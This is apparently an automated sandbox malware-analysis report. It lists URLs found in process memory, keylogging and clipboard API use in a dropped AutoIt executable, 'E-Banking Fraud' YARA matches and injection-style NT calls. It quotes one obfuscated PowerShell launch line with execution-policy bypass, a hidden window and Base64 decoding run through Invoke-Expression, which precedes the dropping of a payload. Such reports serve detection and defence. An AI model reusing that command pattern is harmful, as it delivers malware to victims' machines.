                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://digi-searches.com/Chinese_Art.cfm?fp=wS%2FuHL3fYjNx8GVx8TM0P5j3p0gjdgvycqoHxczx5cPnCkE8mXhD1l
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://digi-searches.com/Online_Art_Galleries.cfm?fp=wS%2FuHL3fYjNx8GVx8TM0P5j3p0gjdgvycqoHxczx5cPnC
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://digi-searches.com/Paint_Pro_Download.cfm?fp=wS%2FuHL3fYjNx8GVx8TM0P5j3p0gjdgvycqoHxczx5cPnCkE
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/js/min.js?v2.3
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/pics/28903/search.png)
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/pics/28905/arrrow.png)
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/pics/29590/bg1.png)
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
                  Source: powershell.exe, 00000003.00000002.1493834556.0000000005840000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000003.00000002.1482495416.0000000004928000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000003.00000002.1482495416.0000000004928000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: powershell.exe, 00000003.00000002.1482495416.00000000047D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000003.00000002.1482495416.0000000004928000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.Anartisthuman.info
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.anartisthuman.info/__media__/design/underconstructionnotice.php?d=anartisthuman.info
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.anartisthuman.info/__media__/js/trademark.php?d=anartisthuman.info&type=ns
                  Source: powershell.exe, 00000003.00000002.1482495416.0000000004928000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000003.00000002.1496956877.0000000007CEA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.
                  Source: hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3819745162.0000000005896000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.teschi.xyz
                  Source: hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3819745162.0000000005896000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.teschi.xyz/61ci/
                  Source: calc.exe, 0000000C.00000003.1868402445.0000000008468000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org?q=
                  Source: powershell.exe, 00000003.00000002.1482495416.00000000047D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
                  Source: powershell.exe, 00000003.00000002.1482495416.0000000004928000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000006DCA000.00000004.10000000.00040000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.000000000492A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://browsehappy.com/
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdn.consentmanager.net
                  Source: calc.exe, 0000000C.00000003.1868402445.0000000008468000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: calc.exe, 0000000C.00000003.1868402445.0000000008468000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: calc.exe, 0000000C.00000003.1868402445.0000000008468000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: powershell.exe, 00000003.00000002.1493834556.0000000005840000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000003.00000002.1493834556.0000000005840000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000003.00000002.1493834556.0000000005840000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://delivery.consentmanager.net
                  Source: hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://dts.gnpge.com
                  Source: calc.exe, 0000000C.00000003.1868402445.0000000008468000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: calc.exe, 0000000C.00000003.1868402445.0000000008468000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
                  Source: calc.exe, 0000000C.00000003.1868402445.0000000008468000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: calc.exe, 0000000C.00000003.1868402445.0000000008468000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gemini.google.com/app?q=
                  Source: powershell.exe, 00000003.00000002.1482495416.0000000004928000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                  Source: calc.exe, 0000000C.00000002.3816500953.0000000003405000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                  Source: calc.exe, 0000000C.00000002.3816500953.0000000003429000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                  Source: calc.exe, 0000000C.00000002.3816500953.0000000003405000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                  Source: calc.exe, 0000000C.00000002.3816500953.0000000003405000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033q
                  Source: calc.exe, 0000000C.00000002.3816500953.0000000003405000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                  Source: calc.exe, 0000000C.00000002.3816500953.0000000003405000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                  Source: calc.exe, 0000000C.00000003.1863400796.0000000008449000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                  Source: powershell.exe, 00000003.00000002.1496956877.0000000007CD7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com64/WindowsPowerShell/v1.0/rShell.dllowsErrorReporting/Microsoft.WindowsErrorRe
                  Source: powershell.exe, 00000003.00000002.1493834556.0000000005840000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                  Source: calc.exe, 0000000C.00000003.1868402445.0000000008468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                  Source: calc.exe, 0000000C.00000003.1868402445.0000000008468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00184164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_00184164
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00184164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_00184164
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00183F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,6_2_00183F66
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0017001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,6_2_0017001C
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0019CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,6_2_0019CABC

                  E-Banking Fraud

                  Source: Yara match File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0000000C.00000002.3816264439.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000007.00000002.1687105036.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000C.00000002.3817612189.0000000004F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000007.00000002.1684081260.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000D.00000002.3819745162.0000000005830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000C.00000002.3817513274.0000000004E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000007.00000002.1687168509.00000000039F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000B.00000002.3817630308.0000000002340000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                  System Summary

                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'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'+[Char]34+'))')))"
                  Source: C:\Users\user\AppData\Roaming\cosses.exe Code function: 6_2_00113B3A This is a third-party compiled AutoIt script.
                  Source: cosses.exe String found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: cosses.exe, 00000006.00000002.1471069477.00000000001C4000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_3cf20019-5
                  Source: cosses.exe, 00000006.00000002.1471069477.00000000001C4000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_a2ca3f76-5
                  Source: cosses.exe.3.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_0be3bd97-4
                  Source: cosses.exe.3.dr String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_416d9603-4
                  Source: cosses[1].exe.3.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_75ead3d6-f
                  Source: cosses[1].exe.3.dr String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_eb62f09e-6
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\cosses.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cosses[1].exe
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0042C6C3 NtClose,7_2_0042C6C3
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036735C0 NtCreateMutant,LdrInitializeThunk,7_2_036735C0
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03672B60 NtClose,LdrInitializeThunk,7_2_03672B60
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_03672DF0
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03672C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_03672C70
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03674340 NtSetContextThread,7_2_03674340
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03673010 NtOpenDirectoryObject,7_2_03673010
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03673090 NtSetValueKey,7_2_03673090
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03674650 NtSuspendThread,7_2_03674650
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03672BE0 NtQueryValueKey,7_2_03672BE0
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03672BF0 NtAllocateVirtualMemory,7_2_03672BF0
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03672BA0 NtEnumerateValueKey,7_2_03672BA0
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03672B80 NtQueryInformationFile,7_2_03672B80
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03672AF0 NtWriteFile,7_2_03672AF0
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03672AD0 NtReadFile,7_2_03672AD0
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03672AB0 NtWaitForSingleObject,7_2_03672AB0
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036739B0 NtGetContextThread,7_2_036739B0
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03672F60 NtCreateProcessEx,7_2_03672F60
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03672F30 NtCreateSection,7_2_03672F30
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03672FE0 NtCreateFile,7_2_03672FE0
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03672FA0 NtQuerySection,7_2_03672FA0
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03672FB0 NtResumeThread,7_2_03672FB0
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03672F90 NtProtectVirtualMemory,7_2_03672F90
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03672E30 NtWriteVirtualMemory,7_2_03672E30
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03672EE0 NtQueueApcThread,7_2_03672EE0
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03672EA0 NtAdjustPrivilegesToken,7_2_03672EA0
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03672E80 NtReadVirtualMemory,7_2_03672E80
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03673D70 NtOpenThread,7_2_03673D70
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03672D30 NtUnmapViewOfSection,7_2_03672D30
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03672D00 NtSetInformationFile,7_2_03672D00
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03672D10 NtMapViewOfSection,7_2_03672D10
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03673D10 NtOpenProcessToken,7_2_03673D10
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03672DD0 NtDelayExecution,7_2_03672DD0
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03672DB0 NtEnumerateKey,7_2_03672DB0
